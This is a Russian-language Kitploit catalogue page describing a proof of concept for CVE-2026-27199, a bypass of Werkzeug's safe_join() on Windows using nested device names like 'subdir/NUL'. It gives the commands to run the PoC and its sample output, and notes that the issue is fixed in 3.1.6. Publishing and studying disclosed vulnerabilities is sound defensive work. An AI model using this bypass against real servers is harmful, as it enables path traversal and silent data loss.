Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-27199-werkzeug-safe-join-bypass-PoC — Доказательство концепции эксплуатации для CVE-2026-27199, обход safe_join() в Werkzeug через имена устройств Windows, демонстрирующий обход пути и незаметное удаление данных. | Kitploit
Инструменты/GitHubGitHub/alimezar/cve-2026-27199-werkzeug-safe-join-bypass-poc
Анализ уязвимостейЭксплуатацияВеб-безопасностьСтатьи и ИсследованияОбучение и Образование
GitHubalimezar/cve-2026-27199-werkzeug-safe-join-bypass-poc

CVE-2026-27199-werkzeug-safe-join-bypass-PoC

Доказательство концепции эксплуатации для CVE-2026-27199, обход safe_join() в Werkzeug через имена устройств Windows, демонстрирующий обход пути и незаметное удаление данных.

Репозиторий
6 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-27199 PoC: Обход Windows-имён устройств в safe_join() из Werkzeug

Статус: Публично раскрыто. Исправлено в werkzeug 3.1.6.
Серьёзность: Умеренная
Автор отчёта: @alimezar
Консультация: GHSA-29vq-49wr-vm6x


Затронутые версии

ПакетЗатронутоИсправлено
werkzeug< 3.1.63.1.6

Доказательство концепции

Требуется: Windows, Python 3.8+, werkzeug < 3.1.6

root@kitploit:~
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py

Ожидаемый вывод (уязвимая версия)

root@kitploit:~
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name          : nt

[+] safe_join(base, 'NUL')        -> None  (correctly blocked)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL  (bypass!)

[*] Attempting to write to the returned path ...
[!] open(nested NUL) write: SUCCESS — data silently discarded by device

[!] VULNERABLE: CVE-2026-27199 confirmed on this installation.
    Upgrade to werkzeug >= 3.1.6 to remediate.

Ожидаемый вывод (исправленная версия)

root@kitploit:~
[+] safe_join(base, 'subdir/NUL') -> None  (correctly blocked)
[+] NOT VULNERABLE: nested device name was blocked.

Ссылки

  • GHSA-29vq-49wr-vm6x — данная консультация
  • GHSA-hgf8-39gv-g3f2 — предыдущая связанная консультация
  • GHSA-87hc-h4r5-73f7 — предыдущая связанная консультация
  • Журнал изменений Werkzeug

Данный PoC опубликован в образовательных и защитных целях после ответственного раскрытия и публичной доступности исправления.

Скачать инструмент